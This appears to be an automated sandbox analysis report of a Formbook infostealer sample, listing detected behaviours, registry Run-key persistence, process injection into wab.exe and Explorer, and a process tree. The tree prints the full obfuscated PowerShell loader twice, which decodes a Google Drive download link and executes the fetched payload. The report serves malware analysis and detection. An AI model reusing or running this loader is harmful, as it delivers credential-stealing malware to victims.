formbook | ea06432b0fe0200a91d19856ff8c0a24fc6bbb52c7ba49f6309555ac7d6797ea

Modify Registry

Processes:

wlanext.exe

description	ioc	process
Key created	\Registry\User\S-1-5-21-2248906074-2862704502-246302768-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	wlanext.exe

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 1360 powershell.exe
7 1360 powershell.exe

flow	pid	process
5	1360	powershell.exe
7	1360	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

Processes:

wlanext.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\DR-TPLEPTH5 = "C:\\Program Files (x86)\\windows mail\\wab.exe"	wlanext.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

4 drive.google.com
5 drive.google.com
9 drive.google.com
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

2648 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

1904 powershell.exe
2648 wab.exe

flow	ioc
4	drive.google.com
5	drive.google.com
9	drive.google.com

pid	process
2648	wab.exe

pid	process
1904	powershell.exe
2648	wab.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

powershell.exewab.exewlanext.exe

description	pid	process	target process
PID 1904 set thread context of 2648	1904	powershell.exe	wab.exe
PID 2648 set thread context of 1204	2648	wab.exe	Explorer.EXE
PID 2044 set thread context of 1204	2044	wlanext.exe	Explorer.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

Processes:

wlanext.exe

description	ioc	process
Key created	\Registry\User\S-1-5-21-2248906074-2862704502-246302768-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	wlanext.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

Processes:

powershell.exepowershell.exewab.exewlanext.exe

pid	process
1360	powershell.exe
1904	powershell.exe
1904	powershell.exe
2648	wab.exe
2648	wab.exe
2044	wlanext.exe
2044	wlanext.exe
2044	wlanext.exe
2044	wlanext.exe
2044	wlanext.exe
2044	wlanext.exe
2044	wlanext.exe
2044	wlanext.exe
2044	wlanext.exe
2044	wlanext.exe
2044	wlanext.exe
2044	wlanext.exe
2044	wlanext.exe
2044	wlanext.exe
2044	wlanext.exe
2044	wlanext.exe
2044	wlanext.exe
2044	wlanext.exe
2044	wlanext.exe
2044	wlanext.exe
2044	wlanext.exe
2044	wlanext.exe

Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exewab.exewlanext.exe

pid process

1904 powershell.exe
2648 wab.exe
2648 wab.exe
2648 wab.exe
2044 wlanext.exe
2044 wlanext.exe
2044 wlanext.exe
2044 wlanext.exe

pid	process
1904	powershell.exe
2648	wab.exe
2648	wab.exe
2648	wab.exe
2044	wlanext.exe
2044	wlanext.exe
2044	wlanext.exe
2044	wlanext.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exewab.exewlanext.exe

description	pid	process
Token: SeDebugPrivilege	1360	powershell.exe
Token: SeDebugPrivilege	1904	powershell.exe
Token: SeDebugPrivilege	2648	wab.exe
Token: SeDebugPrivilege	2044	wlanext.exe

Suspicious use of WriteProcessMemory 29 IoCs

Processes:

WScript.exepowershell.exepowershell.exeExplorer.EXEwlanext.exe

description	pid	process	target process
PID 2324 wrote to memory of 1360	2324	WScript.exe	powershell.exe
PID 2324 wrote to memory of 1360	2324	WScript.exe	powershell.exe
PID 2324 wrote to memory of 1360	2324	WScript.exe	powershell.exe
PID 1360 wrote to memory of 1756	1360	powershell.exe	cmd.exe
PID 1360 wrote to memory of 1756	1360	powershell.exe	cmd.exe
PID 1360 wrote to memory of 1756	1360	powershell.exe	cmd.exe
PID 1360 wrote to memory of 1904	1360	powershell.exe	powershell.exe
PID 1360 wrote to memory of 1904	1360	powershell.exe	powershell.exe
PID 1360 wrote to memory of 1904	1360	powershell.exe	powershell.exe
PID 1360 wrote to memory of 1904	1360	powershell.exe	powershell.exe
PID 1904 wrote to memory of 1540	1904	powershell.exe	cmd.exe
PID 1904 wrote to memory of 1540	1904	powershell.exe	cmd.exe
PID 1904 wrote to memory of 1540	1904	powershell.exe	cmd.exe
PID 1904 wrote to memory of 1540	1904	powershell.exe	cmd.exe
PID 1904 wrote to memory of 2648	1904	powershell.exe	wab.exe
PID 1904 wrote to memory of 2648	1904	powershell.exe	wab.exe
PID 1904 wrote to memory of 2648	1904	powershell.exe	wab.exe
PID 1904 wrote to memory of 2648	1904	powershell.exe	wab.exe
PID 1904 wrote to memory of 2648	1904	powershell.exe	wab.exe
PID 1904 wrote to memory of 2648	1904	powershell.exe	wab.exe
PID 1204 wrote to memory of 2044	1204	Explorer.EXE	wlanext.exe
PID 1204 wrote to memory of 2044	1204	Explorer.EXE	wlanext.exe
PID 1204 wrote to memory of 2044	1204	Explorer.EXE	wlanext.exe
PID 1204 wrote to memory of 2044	1204	Explorer.EXE	wlanext.exe
PID 2044 wrote to memory of 1696	2044	wlanext.exe	Firefox.exe
PID 2044 wrote to memory of 1696	2044	wlanext.exe	Firefox.exe
PID 2044 wrote to memory of 1696	2044	wlanext.exe	Firefox.exe
PID 2044 wrote to memory of 1696	2044	wlanext.exe	Firefox.exe
PID 2044 wrote to memory of 1696	2044	wlanext.exe	Firefox.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of WriteProcessMemory
PID:1204
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Staff performance report..vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2324
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Adolph = 1;Function Upher($Stersbys){$Hexadecimalkoder=$Stersbys.Length-$Adolph;$Damehatteskygge105='Substring';For( $Overstraitly=7;$Overstraitly -lt $Hexadecimalkoder;$Overstraitly+=8){$Tjekkernes+=$Stersbys.$Damehatteskygge105.Invoke( $Overstraitly, $Adolph);}$Tjekkernes;}function Frkapslers($Mastotympanic){ & ($Basunisterne) ($Mastotympanic);}$Udsparing=Upher 'AnomorhMKostebao LudwikzUdmugnii Regni.l.ersemilLseklasaKritike/Gasbeto5 reseda. onosip0O,tfort Rec,nfi(TandkliWA.umrooiLillebrn ,ommundKlargreoIntoxi,wKulhusssBeskres .ovendeN Mukr,gTKrystal Forho.d1 Rensni0avancem. Kraget0Leucope;Vaskeru DoubtsWChockabiGrievabnStrandr6Uns arl4 Drj.er;Sammens Dilettaxpostg.a6Teleigl4Pol ure; Sangfo BoligomrF.rsirivUrethri:C.llarw1 Bandbu2 Ggemme1Cli.fli. B.dger0terrori)Cul,erk hepatiG ApperceDesignlc,jumrenkRagarepoSkraare/vem.dig2 Z.olog0Billard1Middenr0Souchon0Robotiz1 Bau,ki0 miaved1Underre RamaskFLokalraiCaly,sorEvaluate AsservfpulvereoS.ackedxAlterne/U sigel1Tarokke2T issen1Espelve.L,siafm0Lakeren ';$Risorial=Upher 'UnodiouUConverts Su,sereIrratiorUndlade- I.edenAUnd,lyegperleraePottagynCormogetRequite ';$Acetoxim=Upher 'combinahAntol,gtSvenskhtKollegipOversensM,rgavi:Flngeng/Andelsb/ SlightdStraaler Str.bii StaurovSkamfileSkatteg.firedesgspaadomoNordflooPrin,ipgThalamilSikkerheStatsbe.Indkbsac.agfreroCeramicmJigg,rm/fortykkuBred.aac Canton? lreboge.ranspexAmylacepVindskaoBrasswor Flexuotinoppor=P,cocurdProctodo HkledewBrd etsnBidragslFacadaloKaldsekalefselkdImproba&BundholiPengeindIdealis= Tankst1 NonsubpCamisadgRigsbibnK,netop6FirhjulO Re.ompSUnsusp,4 HypokoDCongel.DBok.palsDumhedeFagape,pd malleao TranchjP.nsionlhip,ybeo ekursiBudtraadgTolkni.t addelkn Gentag2Gengivez Gree sbU hulenJAllwortU ProsypBKaffest2PianetaDKomplexa.isvalu5TvesproM Skonn,_Oculis. ';$Termostatregulerede=Upher ' Ce,sef>Du peka ';$Basunisterne=Upher 'igdras,iUnpervae Est,ndxData.as ';$Mi='Okkerskader75';$Gordiacean = Upher 'Mongrele Fl.rercKonkurshslngkapoIm,itte Daahind%Unimpr,aPeriderpBussenspReroofed UndeviaMichailtWolfiegaP.eudog%Populat\apostroLOprrsomoLedigtbvCur lesfInterlesSmergeltHaemospean iocalMusikkos Sovevre Appelar.auzily.EnchantSDer enplUroluteaCuscuta The bro&Sk.svis& Pr.erv RetrogeunderpacRebeauth manvanoVoyaged .aabelit Tv ngs ';Frkapslers (Upher 'Kazitri$RotogragBeskyttlGenpartoTownsenbinterspaDedimusl Owl kl:WhoofinPShel.feaUnfeeblrTvrtimoaRationalDovelikdOverca.eF,isonshBraidiny,ulfovadCo oniaeFyrr ko=Mewcoul(CheeseccIntercem AntedadTicsf,a Ca,make/ProcentcAarrkke Saarhe$KernetrGFilo,ofoDiakac r ,raakldFo,kevii p rmisaLyttledcDiplocoeKampagnaBatwaemnKlnedeb)Fee,bac ');Frkapslers (Upher 'Metag.n$Exci,ovgFecalsylunvoracoGe,tlinbDimensia UncloulMennesk:VenlighKP.anetarUddanneoRen,dyrk A.bejdePapirbirMaale,oeButtr.s= Kontin$Skatt aA SubconcAnstifteMonotomtPromarro D gtcyxTagskgoiUnachinmParenth. NedstisBeeblebp asbestltre.lemiLgfolk.tWoolf,l( Prales$ SociolTDiv.taceLufthavrFirmanamI.ogameoKv rtersMiljakttFabricaaP stpaltV,getarrcol ecte haandkgeriksonuSubsultlAfkry,seVandflyrAnaunt,edobbeltdSlettepeS,edbro)Bekrftm ');$Acetoxim=$Krokere[0];$Indkbsfunktionen= (Upher 'Kollati$MouzahdgShag.obl MalacooEnlivenb Bloms a paymaslActua,y: KerterICrenulanqu.stiodBoyausdt Afst,mgSigbjrntFremti,sKlippengFulderirHumorleuConcretnCoyoterd MoedtolFejlma a.rmkrftgDascha 1Reffoas7Endevrd5differe=DiffereNIs.belleStevel,wVacuous-Pseud.cOGorbresb Ter inj.yperideFik ionc fnakketRevital PointbeSF rodiayAn,eldesFussl.stSmidigheAand romGinkbra. An tikNGynocraeJasperotdugenes.Pro idiWBind,tre Industb SabellCWorkt.blLissotriGipsplaeA,achnineftertat');$Indkbsfunktionen+=$Paraldehyde[1];Frkapslers ($Indkbsfunktionen);Frkapslers (Upher 'Handels$RappellI Invalinbrasilid rintitfritjofg ManicutForsmgts PraesygSarcos.rStn,lapuIndlaannP,interdUkorreklRespondaTensorpgFor.den1Over he7Analys 5Metaxyl.T,enageHde,meste PyloriaStrainedNarrevreMilda,trStaurotsOverabl[ elesel$ DutiesRFeltra,iE,purgasneologioTidaslor.kkerbii Maj,riaPaandtelObelism]Slvlams=Fintlli$BettingU FalsemdExodromsMetaphopChemicoaDisgorgrD,tskrui elvfornForspeagKlamre, ');$Biblicist=Upher 'Benumbs$Logist I GennemnFor,knid BetegntLgemidlgPianettt Spndess SymmetgBan,etsr Mindreu Ves,cunSterlindRefrustlValour.a FtpedvgAbsol,t1Gilledt7 U,seve5Amberfi.Bowkr nD Fi,senoRiksmaaw am.ternVirk,lylSatispaoU,pincraHaandk dDiaca,tFLateropi.nastomlAgendereTmrerme(,aardef$ Tndes.A MejslicButtreseDarenfot Befu,doScandiaxElectroishoqs,umTimuqua,lem ste$OrczombFAntholcoSi,nessrPresha.dGeissorrBoltyanaLa orataTnksommbStrows.eSubcode) Willow ';$Fordraabe=$Paraldehyde[0];Frkapslers (Upher 'Cathart$EupatrigUngainslBarbel.oBullwhibMllerieaCubandelGave,re:UnpresuPPseudoma BorumwrforsikraTilbagef Touch.eUforsrgrB sonokeAitiolodExaugure Ta,lea1Fleuret9Omst lb6 Thorfi=Transan( Part.rTGar.erke hallotsSvejtsitLanguor-LaconizPSidstepaBertolttTrashleh desper Bssend,$DialektFSiciliaoBroenderMelanosdEmbedsfrLageropaAdnexa,aIndsnusbCardioneEmbranc)Takkema ');while (!$Paraferede196) {Frkapslers (Upher 'Sadlym.$,aketbeg passiol Overblo Potho.b Phim,saDelm,enlDr ftsk:IntegraIDiglenocblikkentMillijoe AabenbsChe pentFo karl=Taskmis$All.viat s,agbarRamalu.u BlodpleUnconta ') ;Frkapslers $Biblicist;Frkapslers (Upher 'RadioviSFricti tSh,rulaaLokalplrUnderbot Ondule- Riden.STranspllSemim,seKoalitieEsterenpCyc,oid Lsebogc4Electro ');Frkapslers (Upher 'Prsi en$Stbeforg faareklkjo.enso ,iaisobLejekonaApologilAf,nitt:Dikta uP rmaata Stang.r Guids,aLr lystf ,pgoteeLynchinr JeweleeF mkrondNdsig aeOphtha 1Yashmak9Ernring6 ucentr=Frotteh(K.enfesTU.tuckoe Selskasmiaski.tHankena-WorniluPSalliskaHyp rbatApomorphTrolddo Dielect$ yderzoF PentosoBu noosrPol mandGrevesarantisemaKerwinnaChoks,abArithmoeCentesi) Offerv ') ;Frkapslers (Upher 'Bygning$MartyrmgMegalaclGirendeobupleurbTransska Akvam l U,eabi:S ovbunUSk bslad Geo,intOverscov Ren.eirGenistreRibbesmn Flerstd.achucheLigedan=Indflet$Aga.etig.nipolrlEf,erraoDenaturbMidfasta,klmernlFami.ie:Ins nuaPA chivooSup.rscd yrevogoVasercomNonculpeJohnsontNoninder PreseayLabiove+Ganloes+Barnagt%Vrdighe$Reli.uaKnonsubsrE spertoLyshaark NuttaleMentolsrSerumageStrikbl.Was tubcAmety,tokaarderuVarmefynVarsovitDeliber ') ;$Acetoxim=$Krokere[$Udtvrende];}$Barbery=293629;$Foes=30271;Frkapslers (Upher 'Chita.h$ BarbargBavoso,lHetero o .udivibSerig,aa Saarbal Optoge:Sa,gkorSRelumi tBjergvriKoleraevLastlyceSmouldel Ind aas G afikeMad.nnak GasdreoK rminrrEquidennEmpleadeAb,ogennfilo,speDamoetas Thiosu V scero= Electr Un onisGGallin eZantimptOutlab.- Sel,stCGransknoOutplean Tilb.gt sclepieRoulettnSerologtStammef Svible$O,thgleFGaelicioBordfylrAbnegatdOper,tirpowerpla OmnieraNightmeb PalleneHyphomy ');Frkapslers (Upher 'Hivenes$ Kileysgsyzy,iulPaab,dtoBetnkesbPhytokiamiddelklcusto,i: UdmagrBInputteoMucocutpEpidem,lsejlmags UrocyskBlodsugoBrnebogmMon nermPaakrseuDomnersnBeslagle depletrHo petf Demici =Glycera Unre uc[P,ogramS Solstry.ellebasNobeliutPikantceSqudgyemGlissad.RedningCSpyflueo DaggednDe.trucvEt,ereneSold.tprUnclasstGrafisk]cys.ost:Constan:SkibsstFJackn frInventaoTrave,umGiroensBTrianguaf.acrels SkridseBeskikn6Salient4 ScoopeS Lnram.tUnsubverAr,asrii KliomenVelgrengUgennem(Modific$Ek propSAstr,ngtGakfauniM,dpostvhensynse HdersmlMincings Le,dwaeMealierkMisde loOmlaster Ciffern le.staeTeutophnNonth,ie MarginsUnconta)Tammany ');Frkapslers (Upher ' social$Cosm.nag hloromlPlunderoTuttenubBloodieaBrsspeklPersie,:,nadvanRSkjortei Ny estv Pikan aSalderelMaks maiForml ssDemo ineC.polatrOstensoitar espnRisala gSttteo. P,eudos=Dise th Tal iat[AmbuscaSLeveranyNie erssJderpantCompu,eeNiz.matm earscr. procesTFimbr,leFlers rxPeulvantIndkass.PeriodeEVerifiknL.erskacTitian oPolyododDeformiiHensig,nTheronegKartote] Refrnu:Servede:.ourgeoASammensSErichtoCSkamlseIZardozbIKuaraph.Hydro.yGCharacte Pon,ertGravsnkSPahhoustOxygenerPhysicsiHaandspnSilkelrgtilli,s(Gothici$modemasBSvrhedcoHyd.topp ediskolExt,apos EliesakMil,euroPhosphomPullovemStakladuMa.krennPricklyeSvungnerFrivoli)Kontinu ');Frkapslers (Upher 'gtehust$Ship,argDruggi,lHered toUnsteekblweisspaOpsig.ll.eglvrk:AfskrinOTekstrkoReposoimSympatiyZoolsapc AzonapePersonntCarbinyo Muco uuEklipses Haplop=Arinaad$BaydakoR,ohammeiSpildervUdfal.saTempusel Nordsti.entralsPrimroseArbejdsrSmreoliiBdeudmanSabelkagSku per.Bismages ciagrauParticib alf idsAnoma,otReindeprDo.inikiS perimnIchthyogFolk.mu(Tha ato$IndstrmBExcuderaAnazotur antwibTa.aloneKra brsrMo.adseyUn,easu,Schemat$CoshareFTri utto ascapeeFenmantsOverhjh)Uddista ');Frkapslers $Oomycetous;"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1360
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lovfstelser.Sla && echo t"
      4⤵
      PID:1756
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Adolph = 1;Function Upher($Stersbys){$Hexadecimalkoder=$Stersbys.Length-$Adolph;$Damehatteskygge105='Substring';For( $Overstraitly=7;$Overstraitly -lt $Hexadecimalkoder;$Overstraitly+=8){$Tjekkernes+=$Stersbys.$Damehatteskygge105.Invoke( $Overstraitly, $Adolph);}$Tjekkernes;}function Frkapslers($Mastotympanic){ & ($Basunisterne) ($Mastotympanic);}$Udsparing=Upher 'AnomorhMKostebao LudwikzUdmugnii Regni.l.ersemilLseklasaKritike/Gasbeto5 reseda. onosip0O,tfort Rec,nfi(TandkliWA.umrooiLillebrn ,ommundKlargreoIntoxi,wKulhusssBeskres .ovendeN Mukr,gTKrystal Forho.d1 Rensni0avancem. Kraget0Leucope;Vaskeru DoubtsWChockabiGrievabnStrandr6Uns arl4 Drj.er;Sammens Dilettaxpostg.a6Teleigl4Pol ure; Sangfo BoligomrF.rsirivUrethri:C.llarw1 Bandbu2 Ggemme1Cli.fli. B.dger0terrori)Cul,erk hepatiG ApperceDesignlc,jumrenkRagarepoSkraare/vem.dig2 Z.olog0Billard1Middenr0Souchon0Robotiz1 Bau,ki0 miaved1Underre RamaskFLokalraiCaly,sorEvaluate AsservfpulvereoS.ackedxAlterne/U sigel1Tarokke2T issen1Espelve.L,siafm0Lakeren ';$Risorial=Upher 'UnodiouUConverts Su,sereIrratiorUndlade- I.edenAUnd,lyegperleraePottagynCormogetRequite ';$Acetoxim=Upher 'combinahAntol,gtSvenskhtKollegipOversensM,rgavi:Flngeng/Andelsb/ SlightdStraaler Str.bii StaurovSkamfileSkatteg.firedesgspaadomoNordflooPrin,ipgThalamilSikkerheStatsbe.Indkbsac.agfreroCeramicmJigg,rm/fortykkuBred.aac Canton? lreboge.ranspexAmylacepVindskaoBrasswor Flexuotinoppor=P,cocurdProctodo HkledewBrd etsnBidragslFacadaloKaldsekalefselkdImproba&BundholiPengeindIdealis= Tankst1 NonsubpCamisadgRigsbibnK,netop6FirhjulO Re.ompSUnsusp,4 HypokoDCongel.DBok.palsDumhedeFagape,pd malleao TranchjP.nsionlhip,ybeo ekursiBudtraadgTolkni.t addelkn Gentag2Gengivez Gree sbU hulenJAllwortU ProsypBKaffest2PianetaDKomplexa.isvalu5TvesproM Skonn,_Oculis. ';$Termostatregulerede=Upher ' Ce,sef>Du peka ';$Basunisterne=Upher 'igdras,iUnpervae Est,ndxData.as ';$Mi='Okkerskader75';$Gordiacean = Upher 'Mongrele Fl.rercKonkurshslngkapoIm,itte Daahind%Unimpr,aPeriderpBussenspReroofed UndeviaMichailtWolfiegaP.eudog%Populat\apostroLOprrsomoLedigtbvCur lesfInterlesSmergeltHaemospean iocalMusikkos Sovevre Appelar.auzily.EnchantSDer enplUroluteaCuscuta The bro&Sk.svis& Pr.erv RetrogeunderpacRebeauth manvanoVoyaged .aabelit Tv ngs ';Frkapslers (Upher 'Kazitri$RotogragBeskyttlGenpartoTownsenbinterspaDedimusl Owl kl:WhoofinPShel.feaUnfeeblrTvrtimoaRationalDovelikdOverca.eF,isonshBraidiny,ulfovadCo oniaeFyrr ko=Mewcoul(CheeseccIntercem AntedadTicsf,a Ca,make/ProcentcAarrkke Saarhe$KernetrGFilo,ofoDiakac r ,raakldFo,kevii p rmisaLyttledcDiplocoeKampagnaBatwaemnKlnedeb)Fee,bac ');Frkapslers (Upher 'Metag.n$Exci,ovgFecalsylunvoracoGe,tlinbDimensia UncloulMennesk:VenlighKP.anetarUddanneoRen,dyrk A.bejdePapirbirMaale,oeButtr.s= Kontin$Skatt aA SubconcAnstifteMonotomtPromarro D gtcyxTagskgoiUnachinmParenth. NedstisBeeblebp asbestltre.lemiLgfolk.tWoolf,l( Prales$ SociolTDiv.taceLufthavrFirmanamI.ogameoKv rtersMiljakttFabricaaP stpaltV,getarrcol ecte haandkgeriksonuSubsultlAfkry,seVandflyrAnaunt,edobbeltdSlettepeS,edbro)Bekrftm ');$Acetoxim=$Krokere[0];$Indkbsfunktionen= (Upher 'Kollati$MouzahdgShag.obl MalacooEnlivenb Bloms a paymaslActua,y: KerterICrenulanqu.stiodBoyausdt Afst,mgSigbjrntFremti,sKlippengFulderirHumorleuConcretnCoyoterd MoedtolFejlma a.rmkrftgDascha 1Reffoas7Endevrd5differe=DiffereNIs.belleStevel,wVacuous-Pseud.cOGorbresb Ter inj.yperideFik ionc fnakketRevital PointbeSF rodiayAn,eldesFussl.stSmidigheAand romGinkbra. An tikNGynocraeJasperotdugenes.Pro idiWBind,tre Industb SabellCWorkt.blLissotriGipsplaeA,achnineftertat');$Indkbsfunktionen+=$Paraldehyde[1];Frkapslers ($Indkbsfunktionen);Frkapslers (Upher 'Handels$RappellI Invalinbrasilid rintitfritjofg ManicutForsmgts PraesygSarcos.rStn,lapuIndlaannP,interdUkorreklRespondaTensorpgFor.den1Over he7Analys 5Metaxyl.T,enageHde,meste PyloriaStrainedNarrevreMilda,trStaurotsOverabl[ elesel$ DutiesRFeltra,iE,purgasneologioTidaslor.kkerbii Maj,riaPaandtelObelism]Slvlams=Fintlli$BettingU FalsemdExodromsMetaphopChemicoaDisgorgrD,tskrui elvfornForspeagKlamre, ');$Biblicist=Upher 'Benumbs$Logist I GennemnFor,knid BetegntLgemidlgPianettt Spndess SymmetgBan,etsr Mindreu Ves,cunSterlindRefrustlValour.a FtpedvgAbsol,t1Gilledt7 U,seve5Amberfi.Bowkr nD Fi,senoRiksmaaw am.ternVirk,lylSatispaoU,pincraHaandk dDiaca,tFLateropi.nastomlAgendereTmrerme(,aardef$ Tndes.A MejslicButtreseDarenfot Befu,doScandiaxElectroishoqs,umTimuqua,lem ste$OrczombFAntholcoSi,nessrPresha.dGeissorrBoltyanaLa orataTnksommbStrows.eSubcode) Willow ';$Fordraabe=$Paraldehyde[0];Frkapslers (Upher 'Cathart$EupatrigUngainslBarbel.oBullwhibMllerieaCubandelGave,re:UnpresuPPseudoma BorumwrforsikraTilbagef Touch.eUforsrgrB sonokeAitiolodExaugure Ta,lea1Fleuret9Omst lb6 Thorfi=Transan( Part.rTGar.erke hallotsSvejtsitLanguor-LaconizPSidstepaBertolttTrashleh desper Bssend,$DialektFSiciliaoBroenderMelanosdEmbedsfrLageropaAdnexa,aIndsnusbCardioneEmbranc)Takkema ');while (!$Paraferede196) {Frkapslers (Upher 'Sadlym.$,aketbeg passiol Overblo Potho.b Phim,saDelm,enlDr ftsk:IntegraIDiglenocblikkentMillijoe AabenbsChe pentFo karl=Taskmis$All.viat s,agbarRamalu.u BlodpleUnconta ') ;Frkapslers $Biblicist;Frkapslers (Upher 'RadioviSFricti tSh,rulaaLokalplrUnderbot Ondule- Riden.STranspllSemim,seKoalitieEsterenpCyc,oid Lsebogc4Electro ');Frkapslers (Upher 'Prsi en$Stbeforg faareklkjo.enso ,iaisobLejekonaApologilAf,nitt:Dikta uP rmaata Stang.r Guids,aLr lystf ,pgoteeLynchinr JeweleeF mkrondNdsig aeOphtha 1Yashmak9Ernring6 ucentr=Frotteh(K.enfesTU.tuckoe Selskasmiaski.tHankena-WorniluPSalliskaHyp rbatApomorphTrolddo Dielect$ yderzoF PentosoBu noosrPol mandGrevesarantisemaKerwinnaChoks,abArithmoeCentesi) Offerv ') ;Frkapslers (Upher 'Bygning$MartyrmgMegalaclGirendeobupleurbTransska Akvam l U,eabi:S ovbunUSk bslad Geo,intOverscov Ren.eirGenistreRibbesmn Flerstd.achucheLigedan=Indflet$Aga.etig.nipolrlEf,erraoDenaturbMidfasta,klmernlFami.ie:Ins nuaPA chivooSup.rscd yrevogoVasercomNonculpeJohnsontNoninder PreseayLabiove+Ganloes+Barnagt%Vrdighe$Reli.uaKnonsubsrE spertoLyshaark NuttaleMentolsrSerumageStrikbl.Was tubcAmety,tokaarderuVarmefynVarsovitDeliber ') ;$Acetoxim=$Krokere[$Udtvrende];}$Barbery=293629;$Foes=30271;Frkapslers (Upher 'Chita.h$ BarbargBavoso,lHetero o .udivibSerig,aa Saarbal Optoge:Sa,gkorSRelumi tBjergvriKoleraevLastlyceSmouldel Ind aas G afikeMad.nnak GasdreoK rminrrEquidennEmpleadeAb,ogennfilo,speDamoetas Thiosu V scero= Electr Un onisGGallin eZantimptOutlab.- Sel,stCGransknoOutplean Tilb.gt sclepieRoulettnSerologtStammef Svible$O,thgleFGaelicioBordfylrAbnegatdOper,tirpowerpla OmnieraNightmeb PalleneHyphomy ');Frkapslers (Upher 'Hivenes$ Kileysgsyzy,iulPaab,dtoBetnkesbPhytokiamiddelklcusto,i: UdmagrBInputteoMucocutpEpidem,lsejlmags UrocyskBlodsugoBrnebogmMon nermPaakrseuDomnersnBeslagle depletrHo petf Demici =Glycera Unre uc[P,ogramS Solstry.ellebasNobeliutPikantceSqudgyemGlissad.RedningCSpyflueo DaggednDe.trucvEt,ereneSold.tprUnclasstGrafisk]cys.ost:Constan:SkibsstFJackn frInventaoTrave,umGiroensBTrianguaf.acrels SkridseBeskikn6Salient4 ScoopeS Lnram.tUnsubverAr,asrii KliomenVelgrengUgennem(Modific$Ek propSAstr,ngtGakfauniM,dpostvhensynse HdersmlMincings Le,dwaeMealierkMisde loOmlaster Ciffern le.staeTeutophnNonth,ie MarginsUnconta)Tammany ');Frkapslers (Upher ' social$Cosm.nag hloromlPlunderoTuttenubBloodieaBrsspeklPersie,:,nadvanRSkjortei Ny estv Pikan aSalderelMaks maiForml ssDemo ineC.polatrOstensoitar espnRisala gSttteo. P,eudos=Dise th Tal iat[AmbuscaSLeveranyNie erssJderpantCompu,eeNiz.matm earscr. procesTFimbr,leFlers rxPeulvantIndkass.PeriodeEVerifiknL.erskacTitian oPolyododDeformiiHensig,nTheronegKartote] Refrnu:Servede:.ourgeoASammensSErichtoCSkamlseIZardozbIKuaraph.Hydro.yGCharacte Pon,ertGravsnkSPahhoustOxygenerPhysicsiHaandspnSilkelrgtilli,s(Gothici$modemasBSvrhedcoHyd.topp ediskolExt,apos EliesakMil,euroPhosphomPullovemStakladuMa.krennPricklyeSvungnerFrivoli)Kontinu ');Frkapslers (Upher 'gtehust$Ship,argDruggi,lHered toUnsteekblweisspaOpsig.ll.eglvrk:AfskrinOTekstrkoReposoimSympatiyZoolsapc AzonapePersonntCarbinyo Muco uuEklipses Haplop=Arinaad$BaydakoR,ohammeiSpildervUdfal.saTempusel Nordsti.entralsPrimroseArbejdsrSmreoliiBdeudmanSabelkagSku per.Bismages ciagrauParticib alf idsAnoma,otReindeprDo.inikiS perimnIchthyogFolk.mu(Tha ato$IndstrmBExcuderaAnazotur antwibTa.aloneKra brsrMo.adseyUn,easu,Schemat$CoshareFTri utto ascapeeFenmantsOverhjh)Uddista ');Frkapslers $Oomycetous;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1904
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lovfstelser.Sla && echo t"
        5⤵
        
        PID:1540
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of AdjustPrivilegeToken
        
        PID:2648
- C:\Windows\SysWOW64\wlanext.exe
  "C:\Windows\SysWOW64\wlanext.exe"
  2⤵
  - Adds policy Run key to start application
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2044
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:1696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Defense Evasion

Modify Registry

3